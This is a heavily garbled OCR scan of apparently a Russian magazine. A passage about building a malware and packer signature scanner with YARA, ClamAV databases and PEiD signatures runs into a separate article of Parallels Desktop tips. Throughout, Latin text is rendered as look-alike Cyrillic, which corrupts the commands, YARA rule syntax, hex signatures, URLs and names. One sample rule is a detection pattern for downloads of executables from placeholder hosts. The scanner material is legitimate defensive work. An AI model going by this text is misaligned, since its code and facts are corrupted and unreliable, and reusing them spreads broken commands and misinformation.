Анализатор файлов и антивирус - своими руками 

о Начальство поставило мне довольно интересную задачу. В сжатые 
сроки написать анализатор исполняемых файлов, который по 
сигнатурам умел бы находить тела вирусов и определять 
используемый упаковщик/криптор. Готовый прототип появился уже 
через пару часов. 



Слово автора 

Сразу хочу сказать, что это статья не про суровый реверсинг. И 
даже не про анализ малвари. Скорее я хотел бы поделиться опы- 
том, как огромное количество открытых разработок позволяет 
быстро, буквально на коленке собрать прототипы систем, которые 
на начальных этапах вполне смогут справляться с поставленной 
задачей. Такого прототипа вполне может быть достаточно, чтобы 
оценить состоятельность разработки и понять, нужно ли двигаться 
в этом направлении вообще. Разработать прототип сигнатурного 
анализатора, который бы работал онлайн и мог быть дополнен 
новыми сигнатурами через веб-интерфейс, и стало моей задачей. 
Сначала предлагалось найти какие-то открытые базы сигнатур 
малвари, что оказалось довольно просто. Но обо всем по порядку. 

Сигнатурный анализ 

Поиск вредоносного объекта по сигнатурам — это то, что умеет 
любой антивирус. В общем случае сигнатура — это формализован- 
ное описание некоторых признаков, по которым можно определить, 



что сканируемый файл — это вирус и вирус вполне определенный. 
Тут есть различные методики. Как вариант — использовать сигнату- 
ру, составленную из N байт вредоносного объекта. При этом можно 
сделать не тупое сравнение, а сравнение по некоторой маске (типа 
искать байты ЕВ ?? ?? Сй 13]. Или задавать дополнительные усло- 
вия вроде «такие-то байты должны находиться уточки входа в про- 
грамму» и так далее. Сигнатура именно малвари — это частность. 
Точно так же описываются некоторые признаки, по которым можно 
определить, что исполняемый файл упакован тем или иным крип- 
тором или упаковщиком (например, банальным АЗРаск). Если ты 
внимательно читаешь наш журнал, то точно слышал о такой тулзе 
как РЕЮ, способной определять наиболее часто используемые 
упаковщики, крипторы и компиляторы (в базе есть большое коли- 
чество сигнатур) для переданного ей РЕ-файла. Увы, новые версии 
программы давно не выходят, а недавно на официальном сайте и 
вовсе появилось сообщение, что дальнейшего развития у проекта 
не будет. Жаль, потому что возможности РЕЮ (особенно учитывая 
систему плагинов) вполне могли оказаться мне полезными. После 
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Конвертирование базы вирусных сигнатур в набор 
правил для ѴАВА 

недолгого анализа все-таки стало ясно, что это не вариант. Но 
покопавшись в англоязычных блогах, я быстро нашел то, что мне 
подошло. Проект ѴАРА ( сосіе.доодіе.сот/р/уага-ргоіесі і. 

Что такое ѴАРА? 

Я был с самого начала убежден, что где-то в Сети уже есть откры- 
тые разработки, которая бы взяли на себя задачу определения 
соответствия между некоторой сигнатурой и исследуемым файлом. 
Если бы я смог найти такой проект, то его легко можно было бы 
поставить на рельсы веб-приложения, добавить туда разных сиг- 
натур и получить то, что от меня требовалось. План стал казаться 
еще более реальным, когда я прочитал описание проекта ѴАРА. 
Сами разработчики позиционируют его как инструмент для помо- 
щи исследователям малвари в идентификации и классификации 
вредоносных семплов. Исследователь может создать описания для 
разного типа зловредов, используя текстовые или бинарные паттер- 
ны, в которых описываются формализованные признаки малвари. 
Таким образом получаются сигнатуры. По сути, каждое описание 
состоит из набора строк и некоторого логического выражения, на 
основе которого определяется логика срабатывания анализатора. 
Если для исследуемого файла выполняются условия одного из пра- 
вил, он определяется соответствующим образом (к примеру, червь 
такой-то]. Простой пример правила, чтобы понимать, о чем идет 
речь: 

гиіе 5І1еп1:_Ьапкеп : Ьапкег 

{ 

теТа : 

сіезсгіріііоп = "Т6І5 І5 3*1151: ап ехатріе" 

1:ІігеасІ_1еѵе1 = 3 
іп_1:Ііе_ыі1сІ = Тгие 

5І:гіп§5 : 

$а = {6А 40 68 00 30 00 00 6А 14 8й 91} 

$Ь = {8й 4й В0 2В С1 83 С0 27 99 6А 4Е 59 Р7 Р9} 

$с = м иѵооркѵ5інішРЕіхд2АКсвемт" 

сопсіііііоп : 

$а о г $Ь о г $с 

} 

В этом правиле мы говорим ѴАРА, что любой файл, который содер- 
жит хотя бы одну из строк-семплов, описанных в переменных $а, 

$Ь, $с, должен классифицироваться как троян 5ІІепІ_Ьапкег. И это 
очень простое правило. На деле рулесы могут быть гораздо сложнее 
(мы об этом поговорим ниже). 

Об авторитете проекта ѴАРА говорит уже даже список проектов, 
которые его используют, а это: 

• ѴігизТоІаІ Маіѵѵаге Іпіеііідепсе Зегѵісез ( ѵі-тіз.сот ): 

• ізипраск-п [щипраскдеек.огд ): 

• ѴѴе ѴѴаІсЬ Ѵоиг ѴѴеЬзіІе ( ѵѵеѵѵаІсЬѵоигѵѵеЬзіІе.сот ). 

Весь код написан на Руібоп, причем пользователю предлагается 
как сам модуль для использования в своих разработках, так и про- 
сто исполняемый файл, чтобы юзать ѴАРА как самостоятельное при- 
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Написание правила для упаковщика АЗРаск 

ложение. В рамках своей работы я выбрал первый вариант, но для 
простоты в статье мы будем использовать анализатор просто как 
консольное приложение. 

Немного покопавшись, я довольно быстро разобрался, как писать 
для ѴАРА правила, а также как прикрутить к нему сигнатуры виру- 
сов от бесплатного авера и упаковщиков от РЕЮ. Но начнем мы с 
установки. 

Установка 

Как я уже сказал, проект написан на Руібоп’е, поэтому легко может 
быть установлен и на Ыпих, и на ѴѴіпбоѵѵз, и на Мае. На первых 
порах можно просто взять бинарник. Если вызвать приложение в 
консоли, то получим правила для запуска. 

$ уага 

иза§е: уага [ОРЛОМ]... [КІЛ_ЕРІІ_Е] . . . РНЕ | РЮ 

То есть формат вызова программы следующий: сначала идет имя 
программы, затем список опций, после чего указывается файл с 
правилами, а в самом конце — имя исследуемого файла (или ката- 
лога, содержащего файлы), либо идентификатор процесса. Сейчас 
бы по-хорошему объяснить, как эти самые правила составляются, 
но не хочу сразу грузить тебя сухой теорией. Поэтому мы посту- 
пим по-другому и позаимствуем чужие сигнатуры, чтобы ѴАРА мог 
выполнять одну из поставленных нами задач — полноценное опре- 
деление вирусов по сигнатурам. 

Свой антивирус 

Самый главный вопрос: где взять базу сигнатур известных виру- 
сов? Антивирусные компании активно делятся такими базами 
между собой (кто-то более щедро, кто-то — менее). Если честно, 
я поначалу даже сомневался, что где-то в Сети кто-то открыто 
выкладывает подобные вещи. Но, как оказалось, есть добрые 
люди. Подходящая база из популярного антивируса СІатАѴ 
доступна всем желающим ( сіатаѵ.пеі/іапд/еп ). В разделе «І_а1е5І 
ЗіаЫе Реіеазе» можно найти ссылку на последнюю версию анти- 
вирусного продукта, а также ссылки для скачивания вирусных баз 
СІатАѴ. Нас прежде всего будут интересовать файлы таіп.сѵб ( сІЬ. 
Іосаі.сіатаѵ.пеі/таіп.сѵб ) и баііу.еѵб ( сіь.іосаі.сіатаѵ.пеі/сіаііу.сѵсі ). 
Первый содержит основную базу сигнатур, второй — самую полную 
на данный момент базу с различными дополнениями. Для постав- 
ленной цели вполне хватит баііу.еѵб, в котором собрано более 100 
000 слепков малвари. Однако база СІатАѴ — это не база ѴАРА, так 
что нам необходимо преобразовать ее в нужный формат. Но как? 
Ведь мы пока ничего не знаем ни о формате СІатАѴ, ни о форма- 
те Ѵага. Об этой проблеме уже позаботились до нас, подготовив 
небольшой скриптик, конвертирующий базу вирусных сигнатур 
СІатАѴ в набор правил ѴАРА. Сценарий называется сІатаѵ_1о_ 
уага. ру и написан Мэтью Ричардом ( ЫСІу/убНУз ). Скачиваем скрипт 
и конвертируем базы: 

$ руЫіоп с1ашаѵ_1:о_уапа . ру --Р сіаііу.сѵсі -о сіатаѵ.уага 

В результате в файле сіатаѵ.уага мы получим сигнатурную базу, 
которая сразу будет готова к использованию. Попробуем теперь 
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комбинацию ѴАРА и базы от СІатАѴ в действии. Сканирование 
папки с использованием сигнатуры выполняется одной единствен- 
ной командой: 



-а Д4 чѵ : $Ы0№пІ№' 

Ьі^Иенет | ОДаі>_] I ДЬииА I ЕхЦ 



ИЛЗМп 



I? №Г№Іѵ » | ГГІ 

РЕЮ подтверждает корректность работы ѴАРА 



$ уага -г сіатаѵ.уага /репІіеБВ/тБ-РЗ/сІаІа 

Опция -г указывает, что сканирование необходимо проводить 
рекурсивно по всем подпапкам текущей папки. Если в папке 
/репІезі/тзІЗ/сІаІа были какие-то тела вирусов (по крайней 
мере тех, что есть в базе СІатАѴ), то ѴАРА немедленно об этом 
сообщит. В принципе, это уже готовый сигнатурный сканер. Для 
большего удобства я написал простой скрипт, который проверял 
обновления базы у СІатАѴ, закачивал новые сигнатуры и преоб- 
разовывал их в формат ѴАРА. Но это уже детали. Одна часть зада- 
чи выполнена, теперь можно приступать к составлению правил 
для определения упаковщиков/крипторов. Но для этого пришлось 
немного с ними разобраться. 

Игра по правилам 

Итак, правило — это основной механизм программы, позволяющий 
отнести заданный файл к какой-либо категории. Правила описыва- 
ются в отдельном файле (или файлах) и по своему виду очень напо- 
минают конструкцию зІгисШ из языка С/С++. 



4 . В секции сопсііііоп содержится вся логика правила. Эта секция 
должна содержать логическое выражение, определяющее, в каком 
случае файл или процесс удовлетворяет правилу. Обычно в этой 
секции идет обращение к ранее объявленным строкам. А иденти- 
фикатор строки рассматривается в качестве логической перемен- 
ной, которая возвращает Ігие, если строка была найдена в файле 
или памяти процесса, и Іаізе в противном случае. Вышеуказанное 
правило определяет, что файлы и процессы, содержащие строку 
ѵѵіп.ехе и один из двух II РЦ должны быть отнесены к категории 
ВабВоу (по имени правила). 

5 . Шестнадцатеричные строки позволяют использовать три 
конструкции, которые делают их более гибкими: подстанов- 
ки (ѵѵіШсагсЫ, диапазоны (щпгірз) и альтернативный выбор 
(аііегпаііѵез). Подстановки — это места в строке, которые неизвест- 
ны, и на их месте может быть любое значение. Обозначаются они 
символом «?»: 

$бех_5І:гіп§ = { Е2 34 ?? С8 А? РВ } 



гиіе ВасІВоу 

{ 

бВгіп^б : 

$а = "ыіп.ехе" 

$Ь = ,, І11:1:р://■Роо.сот/ЬасИ^1е1.еxе ,, 

$с = "ІгІ:1:р://Ьаг. сот/ЬасИй1е2.ехе" 

сопсіііііоп : 

$а апсі ($Ь ог $с) 

} 

В принципе, ничего сложного в написании правил нет. В рамках 
этой статьи я коснулся лишь основных моментов, а детали ты най- 
дешь в мануле. Пока же десять самых важных пунктов: 

1. Каждое правило начинается с ключевого слова гиіе, после 
которого идет идентификатор правила. Идентификаторы могут 
иметь такие же имена, как и переменные в С/С++, то есть состоять 
из букв и цифр, причем первый символ не может быть цифрой. 
Максимальная длина имени идентификатора — 128 символов. 

2 . Обычно правила состоят из двух секций: секция определений 
(зігіпдз) и секция условия (сопсііііоп). В секции зігіпдз задаются 
данные, на основе которых в секции сопсііііоп будет приниматься 
решение, удовлетворяет ли заданный файл определенным услови- 
ям. 

3. Каждая строка в разделе зігіпдз имеет свой идентификатор, 
который начинается со знака $ — в общем, как объявление пере- 
менной в рбр. ѴАРА поддерживает обычные строки, заключенные в 
двойные кавычки (« ») и шестнадцатеричные строки, заключенные 
в фигурные скобки ({}), а также регулярные выражения: 



Такой подход очень удобен при задании строк, длина которых 
известна, а содержимое может меняться. Если же часть строки 
может быть разной длины, удобно использовать диапазоны: 

$бех_5І:гіп§ = { Р4 23 [4-6] 62 В4 } 

Данная запись означает, что в средине строки может быть от 4 до 
6 различных байт. Можно реализовать также и альтернативный 
выбор: 

$бех_5І:гіп§ = { Р4 23 ( 62 В4 | 56 ) 45 } 

Это означает, что на месте третьего байта может быть 62 В4 или 56, 
такой записи соответствуют строки Е42362В445 или Е4235645. 

6 . Чтобы проверить, что заданная строка находится по определен- 
ному смещению в файле или адресном пространстве процесса, 
используется оператор аі: 

$а аі: 100 апсі $Ь а* 200 

Если строка может находиться внутри определенного диапазона 
адресов, используется оператор іп: 

$а іп (0. .100) апсі $Ь іп (100. .ІіІеБІіе) 

6 . Иногда возникают ситуации, когда необходимо указать, что 
файл должен содержать определенное число из заданного набора. 
Делается это с помощью оператора оі: 



$ту_1:ех1:_5І:гіп§ = 'Чех* беге" 
$ту_бех_5І:гіп§ = { Е2 34 АІ С8 23 РВ } 



гиіе О-РЕхатрІеІ 
{ 
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Сканирование системной папки $у$іет32 на наличие вирусов при помощи УАРА 



зігіп^з : 

$-Роо1 = "сіиттуі" 

$-Роо2 = "сіиттуг" 

$-РооЗ = "сІиттуЗ" 
сопсіііііоп : 

2 о-Р ($-Роо1,$-Роо2,$-РооЗ) 

} 

Приведенное правило требует, чтобы файл содержал любые две 
строки из множества ($боо 1 ,$1юо2,$1 : ооЗ). Вместо указания кон- 
кретного числа строк в файле можно использовать переменные 
апу (хотя бы одна строка из заданного множества) и а II (все стро- 
ки из заданного множества). 

7 . Ну и последняя интересная возможность, которую надо рассмо- 
треть — применение одного условия ко многим строкам. Эта воз- 
можность очень похожа на оператор об только более мощная — это 
оператор бэп.оі: 

■Рог ехргеззіоп о-Р 5ігіп§_5е1і : ( Ьоо1еап_ехрге55Іоп ) 

Данную запись надо читать так: из строк, заданных в 5Ігіпд_ 
зеі, по крайней мере ехргеззіоп штук должно удовлетворять 
условию ЬооІеап_ехргез5Іоп. Или, другими словами: выраже- 
ние ЬооІеап_ехргеззіоп вычисляется для каждой строки из 
5Ігіпд_зе1;, и ехргеззіоп из них должны возвратить значение 
Тгие. Далее мы рассмотрим эту конструкцию на конкретном 
примере. 

Делаем РЕЮ 

Итак, когда с правилами все стало более менее ясно, можно при- 
ступать к реализации в нашем проекте детектора упаковщиков 
и крипторов. В качестве исходного материала на первых порах 
я позаимствовал сигнатуры известных упаковщиков у все того 
же РЕЮ. В папке ріидіпз находится файл изегсІЬ.ІхІ;, который и 
содержит то, что нам нужно. В моей базе оказалось 1850 сигнатур. 
Немало, так что для того, чтобы полностью импортировать их, 
советую написать какой-нибудь скриптик. Формат этой базы прост 
— используется обычный текстовый файл, в котором хранятся 
записи вида: 

[Мате о-Р ІФе Раскег ѵІ.Ѳ] 

зі§паіиге = 50 Е8 ?? ?? ?? ?? 58 25 ?? РѲ РР РР 8В 

С8 83 С1 60 51 83 С0 40 83 ЕА 06 52 РР 20 90 СЗ 
ер_оп1у = ігие 

Первая строка задает имя упаковщика, которое будет отображаться 
в РЕЮ, для нас же это будет идентификатор правила. Вторая — 
непосредственно сама сигнатура. Третья — флаг ер_оп1у, указываю- 



щий, искать ли данную строку только по адресу точки входа, или же 
по всему файлу. 

Ну что, попробуем создать правило, скажем, для АЭРаск? Как оказа- 
лось, в этом нет ничего сложного. Сначала создадим файл для хра- 
нения правил и назовем его, например, раскегз.уага. Затем ищем в 
базе РЕЮ все сигнатуры, в названии которых фигурирует АЭРаск, и 
переносим их в правило: 

пиіе АБРаск 

{ 

зіігіп^з : 

$ = { 60 Е8 ?? ?? ?? ?? 50 81 ЕО ?? ?? (43 | 44) 

?? В8 ?? ?? (43 | 44) ?? 03 С5 } 

$ = { 60 ЕВ ?? 50 ЕВ ?? РР ?? ?? ?? ?? ?? Е9 } 

[ . . вырезано. . ] 

$ = { 60 Е8 03 00 00 00 Е9 ЕВ 04 5Р 45 55 СЗ 
Е8 01 } 

сопсіііііоп : 

■Рог апу о-Р ІіТіет : ($ аі епігуроіпіі) 

} 

У всех найденных записей флаг ер_опІу установлен в Ігие, то есть 
эти строки должны располагаться по адресу точки входа. Поэтому 
мы пишем следующее условие: «Рог апу оР РЬет : ($ аР епРгуроіпР)». 
Таким образом, наличие хоть одной из заданных строк по адресу 
точки входа будет означать, что файл упакован АЭРаск’ом. Обрати 
также внимание, что в данном правиле все строки заданы просто 
с помощью знака $, без идентификатора. Это возможно, так как в 
сопсІіРіоп-секции мы не обращаемся к каким-то конкретным из них, 
а используем весь набор. 

Чтобы проверить работоспособность полученной системы, достаточ- 
но выполнить в консоли команду: 

$ уага -г раскегз.уага зотеРіІе.ехе 

Скормив туда пару приложений, упакованных АЭРаск’ом, я убедил- 
ся, что все работает! 

Готовый прототип 

УАРА оказался на редкость понятным и прозрачным инструмен- 
том. Мне не составило большого труда написать для него веб- 
админку и наладить работу в качестве веб-сервиса. Немного 
креатива, и сухие результаты анализатора уже раскрашиваются 
разными цветами, обозначая степень опасности найденного 
зловреда. Небольшое обновление базы, и для многих из крипто- 
ров доступно краткое описание, а иногда даже и инструкция по 
распаковке. Прототип создан и работает отменно, а начальство 
пляшет от восторга! т 
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0Е8КТ0Р: 

правильная виташция ІЮДМАС 

1 0 советов ао использованию 
виртуальной машины 

ѳ Мы не раз рассказывали о пакетах виртуализации для ѴѴіпсІоѵѵз- и 
Ыпих-систем. В одном из выпусков даже брались за непростую зада- 
чу - установку Мае 03 X в качестве гостевой ОС. Сегодня мы посмо- 
трим на эту ситуацию с другой стороны и возьмемся за тюнинг самой 
популярной платформы для виртуализации уже под самим Мас’ом 
— РагаІІеІз йезкіор. 





Начать нужно с небольшой исторической справки. Само поня- 
тие виртуализации появилось для пользователей Мае 05 не 
так уж и давно. Первым работающим решением для запуска 
виртуальных машин стало приложение Ѵігіиаі РС бо г Мае, 



но оно было скорее экзотикой. Игрушку для гиков едва ли 
серьезно использовал кто-то из обычных пользователей. Но 
ситуация сильно изменилась, когда Ар р Іе наконец-то перешла 
на архитектуру Іпіеі (в которой изначально заложены возмож- 
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ности виртуализации] и предложила технологию Вооі Сатр для 
одновременной установки Мае 05 и ѴѴіпсІоѵѵз. Через некоторое 
время Ра га Ііеіз, компания с российскими корнями, выпустила 
первый релиз программы Ра га Ііеіз Оезкіор Іюг Мае. Продукт 
поддерживал аппаратную виртуализацию ІпІеІѴТ, позволяя 
ресурсам виртуальных машин напрямую обращаться к аппа- 
ратному обеспечению компьютера. Управление виртуальными 
машинами осуществлялось посредством так называемого 
гипервизора, являющегося «прослойкой» между виртуальной 
машиной и аппаратными ресурсами. Разработчикам удалось 
добиться хорошей производительности работы гостевой ОС и 
предоставить ей доступ к ресурсам хостовой машины (сете- 
вому адаптеру, ІІ5В-устройствам и так далее). О том, насколь- 
ко успешной оказалась разработка, хорошо говорят цифры. 
Утилита сейчас установлена на нескольких миллионах «маков» 
во всем мире. 

Но рассказывать просто про возможности Ра га Ііеіз Оезкіор 
было бы слишком скучно. Не так давно у нас была статья о 
трюках в использовании Ѵігіиаі Вох’а. А в этом материале мы 
попробовали собрать трюки для виртуализации под Мае. По 
умолчанию в Ра га Не Із Оезкіор выставлены настройки, которые 
являются оптимальными для среднестатистического пользо- 
вателя. Но как ни крути, в России маки используются главным 
образом продвинутыми юзерами, у которых к платформе вир- 
туализации вполне конкретное требование — быстродействие. 

А если речь идет о портативных компьютерах Арріе, то еще и 
длительное время работы от батареи. В Р06 можно настроить 
виртуальную машину и так, и эдак, если знать несколько трю- 
ков. 

ЗПкЗадаем оптилдалыный объем 
ВАМ для гостевой ОС и ее при- 
ложении 

Четырех гигабайт РАМ (которыми, как правило, комплектуются 
современные компьютеры Мае) хватает, чтобы две операци- 
онные системы (Мае 05 и ѴѴіпсІоѵѵз) работали по-настоящему 
быстро. По умолчанию в Рагаііеіз Оезкіор для гостевой опера- 
ционки отведен 1 Гб оперативной памяти. Но как ни странно, 
гигабайта может быть даже слишком много — например, в 
случае, если ты в основном работаешь с не слишком требова- 
тельными к ресурсам приложениями. Перебор с количеством 
памяти для виртуальной машины грозит «тормозами» хоста: 
ты отбираешь необходимые ресурсы у Мае 05, из-за чего она 
вынуждена будет использовать файл подкачки. Как быть? 
Рецепт прост: нужно выяснить, сколько оперативной памяти 
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РО позволяет перенести в виртуальное окружение уже 
установленную систему 

реально потребляет виртуальная машина с ѴѴіпсІоѵѵз вместе с 
запущенными под ней нужными тебе приложениями, и назна- 
чить соответствующее значение в настройках Рагаііеіз Оезкіор. 
Решаем задачу прямо в лоб. Для этого запускаем гостевую ОС, 
стартуем стандартный набор приложений и, некоторое время 
проработав с ними, смотрим количество потребляемой памяти 
через самый обычный диспетчер приложений. В ѴѴіпсІоѵѵз 7 
аналогичные показатели можно снять через монитор ресурсов 
(гезтоп.ехе) во вкладке «Память». Полученное значение (+10% 
на всякий случай) и нужно будет выделить для гостевой ОС. 

Это делается через меню «Виртуальная машина-> Настроить -> 
Общие». Правда, перед этим ВМ нужно отключить. Как пока- 
зывает практика, во многих случаях количество необходимой 
РАМ в разы меньше значения, которое остается по умолчанию. 
Сэкономленный объем быстрой (в отличие от ЬЮО] памяти 
останется у Мае 05. 

Тот же самый трик можно провернуть и с количеством памяти 
для дисковой подсистемы гостевой ОС. По умолчанию в РО 
«гостю» отданы 64 Гб, но если ты не собираешься ставить на 
ѴѴіпсІоѵѵз много софта, этот объем можно смело сократить по 
меньшей мере вдвое. 

#2* Выигрываем 1,5-2 часа 
работы от батареи 

Этот трюк хорош для обладателей портативных компьютеров 
Арріе МасВоок Рго. Чаще всего в этих ноутах два видеоа- 
даптера: интегрированный Іпіеі РЮ ОгарЫсз и дискретный 
пѴібіа. Имей в виду: графический чип в портативных Маках 
— один из самых прожорливых компонентов, поэтому если 
наша цель — максимальная автономность и длительное время 
работы компьютера от батареи, лучше не допускать включе- 
ния 30-акселератора. Этот трюк особенно актуален, когда 
под виртуалкой запускается ѴѴіпсІоѵѵз 7, которая по умолча- 
нию использует навороченный интерфейс Аего. Все эти тени, 
полупрозрачные элементы управления и парящие окна отри- 
совываются с помощью ОігесіХ и нагружают графическую под- 
систему. Хотя выглядит Аего симпатично, на качество работы 
в ѴѴіпсІоѵѵз оно не особо влияет, а время автономной работы 
сокращает значительно. Тут надо объяснить, что Рагаііеіз 
Оезкіор перекладывает любой трехмерный эффект, созданный 
средствами ОігесіХ (который не поддерживается на стороне 
Мае 05), в ОрепѲІ_. В процессе нагружается и видеокарта хост- 
компьютера, и оперативная память, что ведет к ненужному 
расходу заряда батареи. Тут есть еще один интересный момент. 
Известно, что портативные компьютеры Мае переключаются с 
интегрированной графики на дискретную «на лету» — сразу же, 
как только возникает необходимость. Переключаться обратно 
(с дискретной на интегрированную) они не умеют. Поэтому, 
если система хотя бы один раз за сеанс работы использовала 
отдельный 30-акселератор, он останется включенным до пер- 
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Оптимизируем количество ОЗУ для ВАЛ и другие 
параметры 



вой перезагрузки. Для настройки Рй на экономичный режим 
работы следует отключить ЗР-ускорение. Это делается в меню 
«Виртуальная машина Настроить -> Оборудование Видео». 
Все что нужно — снять галочку с чекбокса. Но только отключить 
30-эффекты мало, надо еще уменьшить количество видеопамя- 
ти, отведенной виртуальной машине. Поскольку такой огром- 
ный объем для двухмерной графики просто не нужен, мы можем 
смело отдать «лишнюю» память хосту. 

Для отрисовки простого (без Аего) интерфейса ѴѴіпсіоѵѵб 7 и уж 
тем более ѴѴіпсіоѵѵб ХР хватит и 32 Мб (!). Ради чего мы про- 
водим такую оптимизацию? Суди сам: эти простые действия 
помогут выиграть 1,5-2 часа времени работы от батарейки. 
Правда, запускать при таких настройках что-то «тяжелое» уже 
не получится. Но для приложений, использующих 30, есть спе- 
циальные настройки. Об этом — следующий трюк. 



#3. Настраиваем Рйб 
включаем индикатор 



ДДЯигр 



И 



Если есть такая необходимость, то Ра га Ііеіз Оезкіор можно 
легко настроить так, чтобы гостевая ѴѴіпсіоѵѵб показывала в 
играх максимальное быстродействие. Процессоры относитель- 
но свежих Маков имеют по нескольку ядер. Если собираешься 
поиграть в виртуальной машине, тебе нужно переключить все 
имеющиеся ядра на поддержку гостевой ОС (по умолчанию это 
отключено). Делается это так: 

1. Запускаем Рй. 

2. Выбираем виртуальную машину ѴѴіпсіоѵѵб. 

3. В меню «Виртуальная машина -> Настроить -> Общие -> 
Процессоры» выделяем для ВМ все имеющиеся в нашем рас- 
поряжении ядра. 

Наибольший эффект от этой опции ощутим в относительно све- 
жих играх, которые поддерживают многопоточность — напри- 
мер, Еаг Сгу 2. Есть еще один интересный трик. 

Чтобы наглядно оценить его результаты, мы можем вклю- 
чить индикатор ЕР5 Дгатез рег зесопсі — количество кадров 
в секунду). Он активируется специальной командой ‘ѵісіео. 
б6о\л/ЕР5=1 ’, которая вставляется в окно «Загрузочные 
флаги» («Виртуальная машина Настроить -> вкладка 
«Оборудование» -> меню «Порядок загрузки»). Появятся два 
индикатора: левый отображает количество ЕР5, правый — 
количество миллисекунд, которое компьютер затратил на отри- 
совку каждого кадра. 



#4. Добираемся до конфига ВМ 

Ра га Не Із Оезкіор — это продукт для массового пользователя, 
по этой причине через стандартный интерфейс программы мы 
можем добраться только до самых основных настроек. Но как 
и во многих других продуктах для виртуализации, у каждой 
виртуальной машины есть набор файлов и в том числе конфиг, 



Зэгруичн** флаги: м і 



Включаем отобра: кение РР5 




Индикатор слева отображает количество РР5, правый 
— количество миллисекунд, которое компьютер затра- 
тил на отрисовку каждого кадра 

через который можно провести намного более тонкую настрой- 
ку. Предположим, у тебя есть несколько виртуальных машин. 
Любой файл ВМ представляет собой пакет с расширением 
.рѵпп, который по умолчанию находится по адресу /ІІБегз/ <имя_ 
пользователя>/Документы/РагаІІеІ5. Содержимое пакета можно 
посмотреть через Еіпсіег («Показать содержимое пакета»). Нас 
будет интересовать файл сопбд.рѵз. По сути это ХМІ_-документ. 
Его можно открыть в стандартном ТехіЕбіІ или в другом редак- 
торе. 

Файл имеет древовидную структуру, в которой значения пара- 
метров виртуальных машин сгруппированы по функционально- 
му назначению. Меняя параметры в этом файле, можно карди- 
нальным образом влиять на работу виртуальной машины, что 
мы и будем использовать в следующих триках. 

Рекомендую тебе сделать бэкап. Если что-то пойдет не так, ты 
сможешь заменить модифицированный файл исходным в рѵпп- 
п а кете. 

#5. Запускаем виртуальную 
машину в автоматическом 
режиме 

РагаЛеІБ Оезкіор позволяет запускать более 50 самых разных 
операционных систем — от второй версии Мае 05 X до каких- 
нибудь очень специальных ОС вроде Реб На! Епіегргізе. 

В подавляющем большинстве пользователи запускают одну 
только виртуальную машину (чаще всего с ѴѴіпсіоѵѵб). Тем 
не менее, в расчете на то, что у юзера много гостевых ОС, 

Ра га ІІеІБ йеекіор при запуске выводит диалоговое окно, в кото- 
ром предлагает выбрать, что загружать. 

Если у тебя одна только ВМ, лишние клики мышкой могут слег- 
ка раздражать. Можно заставить Рй загружать виртуальную 
машину при нажатии на иконку приложения. Для этого откры- 
ваем файл сопбд.рѵз через ТехіЕбіІог, находим через <СтсІ + Е> 
строку <Аи1;о5І:аг1;>0<Аи1;о5І;аг1;> и вместо 0 ставим 2. Сохраняем 
файл и заново запускаем Рй, чтобы оценить результат. 



► 028 
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#6. Сокращаем время 
загрузки \Ллпсіоѵѵ$ 7 
в виртуальном машине 

Есть два способа значительно уменьшить время загрузки 
ѴѴіпсіоѵѵб 7. Когда ты загружаешь «семерку», в окне виртуаль- 
ной машины сначала отображается информация о В 105, затем 
— логотип ѴѴіпсІоѵѵз 7. Практическая ценность от созерцания 
символов и картинки — нулевая, поэтому их показ можно отклю- 
чить. 

Тут вопрос даже не в эстетике, а в том времени, которое уходит 
на загрузку гостевой ОС. Этоттрик ее ускорит! Чтобы отклю- 
чить отображение информации о ВІ05, открываем сопбд.рѵз 
через ТехіЕФіог и ищем строку <НісІеВіо5Оп5іагіЕпаЫесІ>0</ 
НісІеВіозОпВіагіЕпаЫесЬ, где вместо 0 ставим 1. Чтобы отклю- 
чить заставку с логотипом ѴѴіпсІоѵѵз 7, меняем значение параме- 
тра <ВізаЫеѴѴіп7І_одо>1 </0ізаЫеѴѴіп7І_одо>. 

#7. Отключаем тени от окон 
в режиме Сопегепсе 

Одна из замечательных фишек Рагаііеіз йезкіор — это 
режим Собегепсе, позволяющий работать с ѴѴіпсІоѵѵз- и Мас- 
приложениями, как будто они принадлежат одной операционной 
системе. Идея, как ты справедливо можешь заметить, не нова и 
доступна во многих других продуктах виртуализации. 

Но в Рй эта фишка реализована очень здорово: можно спрятать 
интерфейс ѴѴіпсІоѵѵз, но при этом элементы интерфейса гостевой 
ОС органично встроятся в интерфейс хоста. К примеру, у тебя 
по-прежнему остается доступ к значкам из трея ѴѴіпсІоѵѵз. 

Режим сделан очень красиво и удобно — не придерешься. В его 
скрытых настройках можно разве что отключить тени, отбрасы- 
ваемые окнами. 

Это даст нам возможность выжать еще несколько процентов 
производительности виртуальной машины. Для этого необ- 
ходимо: открыть файл сопбд.рѵз через ТехіЕФіог и поме- 
нять в нем значение параметра <ВізаЫеВгор5ЬасІоѵѵ>0</ 
ВізаЫеВгор5ЬасІоѵѵ>. 

#8. Настройка ЗтаіТМоипі 

Рагаііеіз йезкіор имеет функцию БтагіМоипІ, которая делает 
для виртуальной машины доступными внешние диски (в том 
числе флешки), сетевые диски и 0Ѵ0. 

Если нет необходимости показывать гостевой ОС все категории 
дисков, лишние можно отключить, изменив соответствующий 
параметр в файле конфигурации. Для этого в сопіід.рѵз находим 
параметр <5ЬагесІѴоІиппе5> и приступаем к настройке: 

A) Доступ виртуальной машины к внешним дискам: 
<ІІзеЕхІегпаІВізк5>1 </ІІзеЕхІегпаІВІ5кз>. Доступ включен — 1, 
доступ отключен — 0 (здесь и далее) 

Б) Доступ виртуальной машины к СО/ОѴО-приводам: 
<ІІ5е0Ѵ05>1</ІІ5е0Ѵ05>. 

B) Доступ виртуальной машины к сетевым дискам и/ 
или файловым хранилищам: <ІІзеСоппесІесІ5егѵег5>1 </ 
ІІзеСоппесІесІ5егѵег5>. 




Редактируем сопПд.рѵз 




ческой инфой 

#9. Подключаем сетевые диски 
через гостевую ОС 

Функция «Общий доступ к ѴѴіпсІоѵѵз» позволяет «пробрасы- 
вать» жесткие диски из ѴѴіпсІоѵѵз в Мае 05 X. По умолчанию она 
включена, о чем свидетельствует появление иконки гостевого 
жесткого диска на рабочем столе мака. Но мало кто знает, что с 
помощью «Общего доступа к ѴѴіпсІоѵѵз» можно пробросить в Мае 
05 X сетевые диски, работающие на каких-то экзотических про- 
токолах, с которыми ладит ѴѴіпсІоѵѵз и не дружит Мае 05 X. Чтобы 
увидеть эти диски в Мае 05 X, нужно в сопіід.рѵз активировать 
скрытый параметр АиІоМоипІІЧеІѵѵогкВгіѵез. Затем на всякий 
случай убеждаемся, что в Ра га Ііеіз Оезкіор включена опция 
«Подключать виртуальные диски к рабочему столу Мае». Теперь 
